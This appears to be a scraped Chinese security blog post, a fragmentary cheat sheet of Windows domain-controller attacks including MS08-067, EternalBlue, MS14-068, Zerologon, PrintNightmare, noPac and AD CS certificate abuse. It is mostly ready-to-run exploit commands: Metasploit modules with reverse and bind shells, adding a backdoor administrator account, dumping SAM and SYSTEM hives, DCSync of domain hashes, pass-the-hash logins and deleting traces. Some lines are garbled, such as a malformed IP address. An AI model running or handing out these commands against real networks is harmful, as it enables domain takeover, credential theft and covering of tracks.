use exploit/windows/smb/ms08_067_netapi #使用模块
set rhosts 172.16.5.27 #设置靶机ip
set lhost 172.16.5.28 #设置本地ip
set payload generic/shell_bind_tcp #设置payload
exploit
(向右滑动、查看更多)
cpassword
. 但随后微软在 MSDN 上公布了密钥!,微软在 2014 年发布了一个补丁,阻止管理员将密码输入 GPP。但是该补丁对已经存在的这些易破解密码没有任何作用。Groups.xml
的文件。smbclient //10.10.10.100/Replication -U ""%""
#Kali上的工具gpp-decrypt可以用来解密:
gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
(向右滑动、查看更多)
#impacket工具包的goldenPac.py
python goldenPac.py -dc-ip 192.168.107.146 -target-ip 192.168.107.146 test.com/user:password@dc.test.com
#-dc-ip 是主域控的ip地址
#-target-ip 也是主域控的ip地址
#test.com 是域名
#user是当前域用户
#user冒号后面是当前域用户的密码
#@ 后输入主域计算机名 比如:dc.test.com
-------------------------------------------------------------------------------------------------------------------
#会生成ccache票据
ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码
export KRB5CCNAME=ticket.ccache
python secretsdump.py -k -no-pass test5-2012.hack.org -just-dc
(向右滑动、查看更多)
use auxiliary/scanner/smb/smb_ms17_010 #扫描是否存在该漏洞
set rhosts 10.10.10.14 #设置目标主机的IP,也可以设置整个IP段
set threads 10
exploit
(向右滑动、查看更多)
use exploit/windows/smb/ms17_010_eternalblue #漏洞利用
set rhosts 10.10.10.14 #设置目标主机的IP,也可以设置整个IP段
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.10.147
set lport 4444
exploit
(向右滑动、查看更多)
use exploit/windows/smb/ms17_010_psexec #漏洞利用
set payload windows/meterpreter/bind_tcp
set rhost 192.168.33.33
exploit
(向右滑动、查看更多)
use auxiliary/admin/smb/ms17_010_command #漏洞利用
set rhosts=192.168.26.33.33
set COMMAND net user hack hack123 /add
set COMMAND net localgroup administrators hack /add
exploit
nc -lnvp <reverse_shell_port>
SMBleedingGhost.py <target_ip> <reverse_shell_ip> <reverse_shell_port>
(向右滑动、查看更多)
net group "domain controllers" /domain #查询域控主机名
python3 cve-2020-1472-poc.py Motoo-DCSRV 192.168.159.149 #域控主机名 域控ip
python3 cve-2020-1472-exploit.py Motoo-DCSRV 192.168.159.149 #使用exploit将域控机器账号重置
python3 secretsdump.py Motoo.nc/[email protected]192.168.159.149 -no-pass #四个空格
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:7c85389bc79a4eb184e620b6e8c37905 Motoo.nc/[email protected]192.168.159.149
#然后通过导出 sam system 等文件到本地,获取域控机器上本地保存之前的 hash 值用于恢复,不然就脱域了:
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save #下载到比本地
get sam.save
get security.save
del /f system.save #清理痕迹
del /f sam.save #清理痕迹
del /f security.save #清理痕迹
#通过 sam.save、security.save、system.save 这些文件获得原来域控机器上的 Ntlm Hash 值,用于恢复密码:
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL #提取原密码HASH
#通过拿到 $MACHINE.ACC: 的值,然后进行恢复:注意需要后半部分:
$MACHINE.ACC: 的值$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:ce7b34c0f2c72d6cb03123ef5ff741ca
python3 reinstall_original_pw.py Motoo-DCSRV 192.168.159.149 ce7b34c0f2c72d6cb03123ef5ff741ca
#使用脚本来检测是否恢复密码成功:
python3 secretsdump.py Motoo.nc/[email protected]192.168.159.149 -just-dc -no-pass
#或者还可以使用这个:注意四个空格
python3 secretsdump.py Motoo.nc/[email protected]192.168.159.149 -no-pass
#至此整个攻击已经完成
#mimikatz zerologon域:hacker.testlab
privilge::debug #权限提升
lsadump::zerologon /target:dc.hacker.testlab /account:dc$ #这个是poc
lsadump::zerologon /target:dc.hacker.testlab /account:dc$ /exploit #这个是exp
lsadump::dcsync /domain:HACKER.LOCAL /dc:dc.hacker.testlab /user:krbtgt /authuser:dc$ /authdomain:HACKER /authpassword:"" /authntlm #再次空密码尝试
lsadump::postzerologon /target:192.168.43.100 /account:dc$ #恢复密码
(向右滑动、查看更多)
利⽤CVE-2021-1675 打印机服务漏洞加载DLL执⾏代码。影响2008-2019。需要域内凭证,实测2016和2019可利⽤成功
使⽤impacket rpcdump.py脚本检测print spooler服务
pcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
(向右滑动、查看更多)
./CVE-2021-1675.py hackit.local/domain_user:[email protected]168.1.10 '\\192.168.1.215\smb\addCube.dll'
./CVE-2021-1675.py hackit.local/domain_user:[email protected]168.1.10 'C:\addCube.dll'
(向右滑动、查看更多)
python3 sam_the_admin.py hack.com/test:Aa123456 -dc-ip 192.168.11.250 -debug
python3 sam_the_admin.py hack.com/test:Aa123456 -dc-ip 192.168.11.250 -dump -debug #dcsync
python3 sam_the_admin.py hack.com/test:Aa123456 -dc-ip 192.168.11.250 -shell -debug
https://github.com/WazeHell/sam-the-admin
https://github.com/Ridter/noPac
https://github.com/cube0x0/noPac
#https://github.com/cube0x0/noPac
#检测漏洞
noPac.exe scan -domain qaq.org -user admin -pass 'Aa123456'
#利用漏请求域管用户 cifs服务ST,用于访问共享
noPac.exe -domain qaq.org -user admin -pass 'Aa123456' /dc test5-2012.qaq.org /mAccount saulgoodman /mPassword passW0rd /service cifs /ptt
#利用漏洞请求域管用户 ldap服务ST,用于dcsync
noPac.exe -domain qaq.org -user admin -pass 'Aa123456' /dc test5-2012.qaq.org /mAccount saulgoodman /mPassword passW0rd /service ldap /ptt
#利用漏洞请求域管用户HOST/RPCSS服务ST,用于执行命令。可远程利用
noPac.exe -domain qaq.org -user admin -pass 'Aa123456' /dc test5-2012.qaq.org /mAccount saulgoodman /mPassword passW0rd /service HOST /ptt
noPac.exe -domain qaq.org -user admin -pass 'Aa123456' /dc test5-2012.qaq.org /mAccount saulgoodman /mPassword passW0rd /service RPCSS /ptt
#远程利用导出注入LDAP dcsync,先用MIMIkatz导出票据
python ticket_converter.py ticket.kirbi ticket.ccache #kirbi转换为impacket ccache票据格式
export KRB5CCNAME=ticket.ccache
python secretsdump.py -k -no-pass test5-2012.qaq.org -just-dc
(向右滑动、查看更多)
Windows Server 2012 R2 Windows RT 8.1 Windows 8.1 Windows Server 2016 Windows 10 Windows 10 Version 21H2 Windows 11 Windows Server, version 20H2
Windows 10 Version 20H2 Windows Server 2022 Windows 10 Version 21H1 Windows 10 Version 1909 Windows Server 2019 Windows 10 Version 1809
(向右滑动、查看更多)
powershell Get-ChildItem Cert:\LocalMachine\Root\ #列出本地机器账户的证书,用于发现CA名称
(向右滑动、查看更多)
#https://github.com/CravateRouge/bloodyAD
# 创建机器账户
python3 bloodyAD.py -d redteam.lab -u ken -p '123.com' --host 10.10.2.20 addComputer CPT01 'Passw0rd'
# 设置dNSHostName
python3 bloodyAD.py -d redteam.lab -u ken -p '123.com' --host 10.10.2.20 setAttribute 'CN=CPT01,CN=Computers,DC=redteam,DC=lab' DNSHostName '["DC2016.redteam.lab"]'
(向右滑动、查看更多)
certipy req 'redteam.lab/CPT01$:Passw0rd@DC2016.redteam.lab' -ca 'redteam-DC2016-CA' -template 'Machine'
(向右滑动、查看更多)
certipy auth -pfx dc2016.pfx -username DC2016$ -domain redteam.lab-dc-ip 10.10.2.20
(向右滑动、查看更多)
KRB5CCNAME=dc2016.ccache python3 secretsdump.py -k redteam.lab/DC2016\[email protected]dc20
(向右滑动、查看更多)
python3 wmiexec.py -hashes :83a140d89e42046e8daf5394d386a69a redteam.lab/administrator@10.10.2.20 -dc-ip 10.10.2.20
(向右滑动、查看更多) 精彩推荐